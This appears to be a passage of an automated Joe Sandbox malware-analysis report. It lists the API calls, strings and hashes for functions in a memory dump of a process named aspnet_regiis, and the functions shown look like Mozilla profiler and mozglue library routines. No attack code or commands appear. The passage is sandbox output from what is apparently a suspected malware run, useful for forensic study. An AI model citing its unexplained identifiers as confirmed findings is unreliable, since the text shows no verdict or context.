                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C7F56FD
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C7F5716
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C7F572F
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C7F5748
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C7F5761
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C7F577A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C7F5793
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C7F57A8
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C7F57BD
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C7F57D5
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C7F57EA
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C7F57FF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                    • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                    • API String ID: 2238633743-1964193996
                                                                                                                                                                    • Opcode ID: 3ee0154ed0f9820dc128abc09d8b4bd1ef2a4cb313d60efa88dba742b754a4a6
                                                                                                                                                                    • Instruction ID: 303eaa62778184ebb935e75930cca075c59c7b09db6d8e7ff4f2ec60d818faaf
                                                                                                                                                                    • Opcode Fuzzy Hash: 3ee0154ed0f9820dc128abc09d8b4bd1ef2a4cb313d60efa88dba742b754a4a6
                                                                                                                                                                    • Instruction Fuzzy Hash: 0A5164B07117075BDB209F36AF4597A3AF9AB1675DB108835A821E3F42EB74D801CFA0
                                                                                                                                                                    Function 6C7DCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C7A582D), ref: 6C7DCC27
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C7A582D), ref: 6C7DCC3D
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C80FE98,?,?,?,?,?,6C7A582D), ref: 6C7DCC56
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C7A582D), ref: 6C7DCC6C
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C7A582D), ref: 6C7DCC82
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C7A582D), ref: 6C7DCC98
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7A582D), ref: 6C7DCCAE
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C7DCCC4
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C7DCCDA
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C7DCCEC
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C7DCCFE
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C7DCD14
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C7DCD82
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C7DCD98
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C7DCDAE
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C7DCDC4
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C7DCDDA
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C7DCDF0
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C7DCE06
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C7DCE1C
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C7DCE32
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C7DCE48
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C7DCE5E
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C7DCE74
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C7DCE8A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: strcmp
                                                                                                                                                                    • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                    • API String ID: 1004003707-2809817890
                                                                                                                                                                    • Opcode ID: a111e0e07c0429f79f818eeef09983e519862fd681fdc8e9a1702d379d4f4243
                                                                                                                                                                    • Instruction ID: 0133e1be6d6dc11e13c6ebd91fdab3668d04d318205f779c58ebfd4bde5fd809
                                                                                                                                                                    • Opcode Fuzzy Hash: a111e0e07c0429f79f818eeef09983e519862fd681fdc8e9a1702d379d4f4243
                                                                                                                                                                    • Instruction Fuzzy Hash: 6651CAD1B1522521FA1038196F13BAA5649EF5324BF22483EFD09A2FC1FF14B20986B7
                                                                                                                                                                    Function 6C7A47C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C7A4801
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7A4817
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7A482D
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A484A
                                                                                                                                                                      • Part of subcall function 6C7CAB3F: EnterCriticalSection.KERNEL32(6C81E370,?,?,6C793527,6C81F6CC,?,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB49
                                                                                                                                                                      • Part of subcall function 6C7CAB3F: LeaveCriticalSection.KERNEL32(6C81E370,?,6C793527,6C81F6CC,?,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CAB7C
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7A485F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7A487E
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7A488B
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7A493A
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7A4956
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7A4960
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7A499A
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7A49C6
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7A49E9
                                                                                                                                                                      • Part of subcall function 6C7B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C7B5EDB
                                                                                                                                                                      • Part of subcall function 6C7B5E90: memset.VCRUNTIME140(6C7F7765,000000E5,55CCCCCC), ref: 6C7B5F27
                                                                                                                                                                      • Part of subcall function 6C7B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C7B5FB2
                                                                                                                                                                    Strings
                                                                                                                                                                    • MOZ_PROFILER_SHUTDOWN, xrefs: 6C7A4A42
                                                                                                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C7A4812
                                                                                                                                                                    • [I %d/%d] profiler_shutdown, xrefs: 6C7A4A06
                                                                                                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C7A4828
                                                                                                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C7A47FC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                                                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                                                                                                                    • API String ID: 1340022502-4194431170
                                                                                                                                                                    • Opcode ID: 3871954940e62cea960938981cd52dfcb687942b011a4e7819e1379a30142b19
                                                                                                                                                                    • Instruction ID: 2c34aa34eb5751abe4c1ef7ec38eb0a2ba307e241bfa40a2466a26b605f3de79
                                                                                                                                                                    • Opcode Fuzzy Hash: 3871954940e62cea960938981cd52dfcb687942b011a4e7819e1379a30142b19
                                                                                                                                                                    • Instruction Fuzzy Hash: C2814671A001028FDB20DFA9DA4971A37F5BB5231CF140739E80697F42DB32E856DB9A
                                                                                                                                                                    Function 6C7A4470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7A4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C7A44B2,6C81E21C,6C81F7F8), ref: 6C7A473E
                                                                                                                                                                      • Part of subcall function 6C7A4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C7A474A
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C7A44BA
                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C7A44D2
                                                                                                                                                                    • InitOnceExecuteOnce.KERNEL32(6C81F80C,6C79F240,?,?), ref: 6C7A451A
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C7A455C
                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 6C7A4592
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(6C81F770), ref: 6C7A45A2
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000008), ref: 6C7A45AA
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000018), ref: 6C7A45BB
                                                                                                                                                                    • InitOnceExecuteOnce.KERNEL32(6C81F818,6C79F240,?,?), ref: 6C7A4612
                                                                                                                                                                    • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C7A4636
                                                                                                                                                                    • LoadLibraryW.KERNEL32(user32.dll), ref: 6C7A4644
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C7A466D
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A469F
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A46AB
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A46B2
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A46B9
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A46C0
                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C7A46CD
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C7A46F1
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C7A46FD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                    • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                    • API String ID: 1702738223-3894940629
                                                                                                                                                                    • Opcode ID: d16f652bb06d67063696c908db9d6767ccf880fe8d7ca4c7f91253fbad8de341
                                                                                                                                                                    • Instruction ID: a5953d5994d2a085fb187792c6a6d2d62bec603b942f0b605ba683c3c492a651
                                                                                                                                                                    • Opcode Fuzzy Hash: d16f652bb06d67063696c908db9d6767ccf880fe8d7ca4c7f91253fbad8de341
                                                                                                                                                                    • Instruction Fuzzy Hash: B361E8B06042459FEB209FA0CE0ABA57BF8EF5630CF048A78E5049BF51D7B19546CF91
                                                                                                                                                                    Function 6C7DF6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF70E
                                                                                                                                                                    • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C7DF8F9
                                                                                                                                                                      • Part of subcall function 6C7A6390: GetCurrentThreadId.KERNEL32 ref: 6C7A63D0
                                                                                                                                                                      • Part of subcall function 6C7A6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C7A63DF
                                                                                                                                                                      • Part of subcall function 6C7A6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C7A640E
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF93A
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF98A
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF990
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF994
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF716
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                      • Part of subcall function 6C79B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C79B5E0
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF739
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF746
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF793
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C81385B,00000002,?,?,?,?,?), ref: 6C7DF829
                                                                                                                                                                    • free.MOZGLUE(?,?,00000000,?), ref: 6C7DF84C
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C7DF866
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7DFA0C
                                                                                                                                                                      • Part of subcall function 6C7A5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7A55E1), ref: 6C7A5E8C
                                                                                                                                                                      • Part of subcall function 6C7A5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7A5E9D
                                                                                                                                                                      • Part of subcall function 6C7A5E60: GetCurrentThreadId.KERNEL32 ref: 6C7A5EAB
                                                                                                                                                                      • Part of subcall function 6C7A5E60: GetCurrentThreadId.KERNEL32 ref: 6C7A5EB8
                                                                                                                                                                      • Part of subcall function 6C7A5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7A5ECF
                                                                                                                                                                      • Part of subcall function 6C7A5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C7A5F27
                                                                                                                                                                      • Part of subcall function 6C7A5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C7A5F47
                                                                                                                                                                      • Part of subcall function 6C7A5E60: GetCurrentProcess.KERNEL32 ref: 6C7A5F53
                                                                                                                                                                      • Part of subcall function 6C7A5E60: GetCurrentThread.KERNEL32 ref: 6C7A5F5C
                                                                                                                                                                      • Part of subcall function 6C7A5E60: GetCurrentProcess.KERNEL32 ref: 6C7A5F66
                                                                                                                                                                      • Part of subcall function 6C7A5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C7A5F7E
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7DF9C5
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7DF9DA
                                                                                                                                                                    Strings
                                                                                                                                                                    • Thread , xrefs: 6C7DF789
                                                                                                                                                                    • " attempted to re-register as ", xrefs: 6C7DF858
                                                                                                                                                                    • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C7DF9A6
                                                                                                                                                                    • [D %d/%d] profiler_register_thread(%s), xrefs: 6C7DF71F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                                                                                    • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                                                                                    • API String ID: 882766088-1834255612
                                                                                                                                                                    • Opcode ID: 41585a08435a81ebd4ad462a3fc1d72939fcb939d4a02b86cc4ab90df639e281
                                                                                                                                                                    • Instruction ID: ee7e3895d886c5182a4ebe82f581cf1fa6ed467c43cbc19d2987355ef31dd6f1
                                                                                                                                                                    • Opcode Fuzzy Hash: 41585a08435a81ebd4ad462a3fc1d72939fcb939d4a02b86cc4ab90df639e281
                                                                                                                                                                    • Instruction Fuzzy Hash: 86811771A043019FD720DF24CA48BAABBF5EF85308F45456DE8499BB51EB30E949CBD2
                                                                                                                                                                    Function 6C7DEE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DEE60
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DEE6D
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DEE92
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C7DEEA5
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C7DEEB4
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7DEEBB
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DEEC7
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DEECF
                                                                                                                                                                      • Part of subcall function 6C7DDE60: GetCurrentThreadId.KERNEL32 ref: 6C7DDE73
                                                                                                                                                                      • Part of subcall function 6C7DDE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C7A4A68), ref: 6C7DDE7B
                                                                                                                                                                      • Part of subcall function 6C7DDE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C7A4A68), ref: 6C7DDEB8
                                                                                                                                                                      • Part of subcall function 6C7DDE60: free.MOZGLUE(00000000,?,6C7A4A68), ref: 6C7DDEFE
                                                                                                                                                                      • Part of subcall function 6C7DDE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C7DDF38
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: GetCurrentProcess.KERNEL32(?,6C7931A7), ref: 6C7CCBF1
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7931A7), ref: 6C7CCBFA
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DEF1E
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DEF2B
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DEF59
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DEFB0
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DEFBD
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DEFE1
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DEFF8
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF000
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
